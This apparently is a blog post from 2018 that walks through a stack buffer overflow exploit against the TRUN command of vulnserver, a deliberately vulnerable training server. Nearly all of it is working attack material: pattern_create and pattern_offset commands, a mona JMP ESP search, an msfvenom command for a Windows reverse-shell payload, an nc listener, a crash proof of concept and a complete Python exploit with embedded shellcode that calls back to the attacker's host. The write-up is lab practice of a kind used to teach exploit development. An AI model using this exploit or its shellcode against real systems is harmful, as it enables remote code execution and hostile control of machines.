Saturday, 25 August 2018

Vulnserver.exe – TRUN command buffer overflow exploit


Commands:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5040    # cyclic pattern, sent in place of the "A" filler of the crash PoC below
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 386f4337    # the EIP value seen in the debugger -> offset 2003, used as the filler length in the final exploit
!mona jmp -r esp
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.85.136 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -f python    # LHOST/LPORT must match the nc listener below; '\x00' is the only bad character assumed here — confirm with a bad-character test on the target before relying on it
nc -nlvp 4444


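#!/usr/bin/python
"""Crash proof-of-concept for vulnserver's TRUN command.

Sends ``TRUN /.:/`` followed by 5050 bytes of ``A`` filler, enough to
overrun the stack buffer behind the command (the saved-EIP offset was
later pinned to 2003 with pattern_create/pattern_offset).
"""
import socket
import os
import sys

HOST = "192.168.2.135"     # vulnserver target
PORT = 9999                # vulnserver listening port
CRASH_LENGTH = 5050        # filler length used for the crash
COMMAND_PREFIX = b"TRUN /.:/"


def build_crash_buffer(length=CRASH_LENGTH):
    """Return the TRUN request carrying ``length`` bytes of ``A`` filler.

    The payload is built as bytes rather than text so it goes on the wire
    unchanged under both Python 2 and Python 3.

    Raises ValueError for a negative ``length`` (a negative repeat count
    would otherwise silently produce an empty filler).
    """
    if length < 0:
        raise ValueError("filler length must be non-negative, got %d" % length)
    return COMMAND_PREFIX + b"A" * length


def send_payload(host, port, payload, timeout=5.0):
    """Deliver ``payload`` to ``host:port`` over TCP and close the socket.

    ``sendall`` is used because ``send`` may write only part of a large
    buffer; the timeout keeps the script from hanging on an unresponsive
    target, and the socket is closed even when connect/send raises.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        sock.sendall(payload)
    finally:
        sock.close()


if __name__ == "__main__":
    send_payload(HOST, PORT, build_crash_buffer())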
----------------------------------------------------------------------------------------------------------------------
































7C941EED   FFE4             JMP ESP
\xed\x1e\x94\x7c   (0x7C941EED written little-endian, which is how it must appear in the buffer)
Note: this gadget was picked from the modules loaded in the target process via `!mona jmp -r esp`. An address in the 0x7C9xxxxx range looks like it comes from an OS system DLL rather than vulnserver's bundled essfunc.dll, so it is specific to that Windows build and will not survive ASLR or rebasing; re-run mona on each target and prefer a JMP ESP from a module without ASLR/rebase.

buffer = "TRUN /.:/" + "A" * 2003 + "\xed\x1e\x94\x7c" + "\x90" * 16 +  buf + "C" * (5060 - 2003 - 4 - 16 - len(buf))








------------------------------------------------------------------------------------------------------------------------------
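#!/usr/bin/python
"""Vulnserver TRUN stack-overflow exploit: JMP ESP into a reverse shell.

Request layout after the ``TRUN /.:/`` command prefix:

    "A" * 2003    filler up to the saved return address (offset from pattern_offset)
    RET_ADDR      0x7C941EED, a JMP ESP located with ``!mona jmp -r esp``
    16 NOP bytes  short sled in front of the shellcode
    SHELLCODE     msfvenom windows/shell_reverse_tcp, shikata_ga_nai, bad char 0x00
    "C" * n       padding so everything after the prefix stays exactly 5060 bytes

Start the listener (``nc -nlvp 4444``) on the LHOST baked into the shellcode
before sending.
"""
import socket
import struct
import os
import sys

# NOTE(review): this is the same address as LHOST in the msfvenom command
# used to generate the shellcode; confirm it is the target, not the listener.
HOST = "192.168.85.136"
PORT = 9999

COMMAND_PREFIX = b"TRUN /.:/"
EIP_OFFSET = 2003                          # bytes from start of the argument to the saved EIP
RET_ADDR = struct.pack("<I", 0x7C941EED)   # JMP ESP, little-endian -> \xed\x1e\x94\x7c
NOP_SLED = b"\x90" * 16
PAYLOAD_LEN = 5060                         # total bytes sent after the TRUN prefix
BAD_CHARS = b"\x00"                        # the only byte excluded when encoding (msfvenom -b '\x00')

# msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp
#   LHOST=192.168.85.136 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -f python
SHELLCODE = (
    b"\xba\x43\x68\xa7\xb9\xdb\xcb\xd9\x74\x24\xf4\x5f\x31"
    b"\xc9\xb1\x52\x31\x57\x12\x03\x57\x12\x83\xac\x94\x45"
    b"\x4c\xce\x8d\x08\xaf\x2e\x4e\x6d\x39\xcb\x7f\xad\x5d"
    b"\x98\xd0\x1d\x15\xcc\xdc\xd6\x7b\xe4\x57\x9a\x53\x0b"
    b"\xdf\x11\x82\x22\xe0\x0a\xf6\x25\x62\x51\x2b\x85\x5b"
    b"\x9a\x3e\xc4\x9c\xc7\xb3\x94\x75\x83\x66\x08\xf1\xd9"
    b"\xba\xa3\x49\xcf\xba\x50\x19\xee\xeb\xc7\x11\xa9\x2b"
    b"\xe6\xf6\xc1\x65\xf0\x1b\xef\x3c\x8b\xe8\x9b\xbe\x5d"
    b"\x21\x63\x6c\xa0\x8d\x96\x6c\xe5\x2a\x49\x1b\x1f\x49"
    b"\xf4\x1c\xe4\x33\x22\xa8\xfe\x94\xa1\x0a\xda\x25\x65"
    b"\xcc\xa9\x2a\xc2\x9a\xf5\x2e\xd5\x4f\x8e\x4b\x5e\x6e"
    b"\x40\xda\x24\x55\x44\x86\xff\xf4\xdd\x62\x51\x08\x3d"
    b"\xcd\x0e\xac\x36\xe0\x5b\xdd\x15\x6d\xaf\xec\xa5\x6d"
    b"\xa7\x67\xd6\x5f\x68\xdc\x70\xec\xe1\xfa\x87\x13\xd8"
    b"\xbb\x17\xea\xe3\xbb\x3e\x29\xb7\xeb\x28\x98\xb8\x67"
    b"\xa8\x25\x6d\x27\xf8\x89\xde\x88\xa8\x69\x8f\x60\xa2"
    b"\x65\xf0\x91\xcd\xaf\x99\x38\x34\x38\x66\x14\x63\x35"
    b"\x0e\x67\x8b\x54\x93\xee\x6d\x3c\x3b\xa7\x26\xa9\xa2"
    b"\xe2\xbc\x48\x2a\x39\xb9\x4b\xa0\xce\x3e\x05\x41\xba"
    b"\x2c\xf2\xa1\xf1\x0e\x55\xbd\x2f\x26\x39\x2c\xb4\xb6"
    b"\x34\x4d\x63\xe1\x11\xa3\x7a\x67\x8c\x9a\xd4\x95\x4d"
    b"\x7a\x1e\x1d\x8a\xbf\xa1\x9c\x5f\xfb\x85\x8e\x99\x04"
    b"\x82\xfa\x75\x53\x5c\x54\x30\x0d\x2e\x0e\xea\xe2\xf8"
    b"\xc6\x6b\xc9\x3a\x90\x73\x04\xcd\x7c\xc5\xf1\x88\x83"
    b"\xea\x95\x1c\xfc\x16\x06\xe2\xd7\x92\x36\xa9\x75\xb2"
    b"\xde\x74\xec\x86\x82\x86\xdb\xc5\xba\x04\xe9\xb5\x38"
    b"\x14\x98\xb0\x05\x92\x71\xc9\x16\x77\x75\x7e\x16\x52"
)


def build_eip_check(ret_addr=RET_ADDR, offset=EIP_OFFSET, total_len=PAYLOAD_LEN):
    """Return the intermediate "does RET_ADDR land in EIP" buffer.

    Filler + return address + ``C`` padding, no shellcode; kept from the
    development steps so the jump can be re-verified in a debugger after
    changing ``ret_addr`` for a different target build.
    """
    padding = total_len - offset - len(ret_addr)
    return COMMAND_PREFIX + b"A" * offset + ret_addr + b"C" * padding


def build_exploit(shellcode=SHELLCODE, ret_addr=RET_ADDR, offset=EIP_OFFSET,
                  nop_sled=NOP_SLED, total_len=PAYLOAD_LEN):
    """Assemble the full TRUN request as bytes.

    Layout: prefix + ``A`` * offset + ret_addr + nop_sled + shellcode + ``C``
    padding, with everything after the prefix exactly ``total_len`` bytes.

    Raises ValueError if ``shellcode`` contains a byte from BAD_CHARS or the
    pieces do not fit in ``total_len`` (a negative repeat count would
    otherwise silently yield an over-long buffer with no padding).
    """
    # Works on both Python 2 (iterating bytes gives str) and 3 (gives int).
    found = [c for c in BAD_CHARS if c in shellcode]
    if found:
        raise ValueError("shellcode contains bad character(s): %r" % (found,))
    padding = total_len - offset - len(ret_addr) - len(nop_sled) - len(shellcode)
    if padding < 0:
        raise ValueError("payload exceeds %d bytes by %d" % (total_len, -padding))
    return (COMMAND_PREFIX + b"A" * offset + ret_addr + nop_sled
            + shellcode + b"C" * padding)


def send_exploit(host, port, payload, timeout=5.0):
    """Deliver ``payload`` to ``host:port`` over TCP and close the socket.

    ``sendall`` is used because ``send`` may write only part of a 5 KB
    buffer; the timeout keeps the script from hanging on an unresponsive
    target, and the socket is closed even when connect/send raises.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        sock.sendall(payload)
    finally:
        sock.close()


if __name__ == "__main__":
    send_exploit(HOST, PORT, build_exploit())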
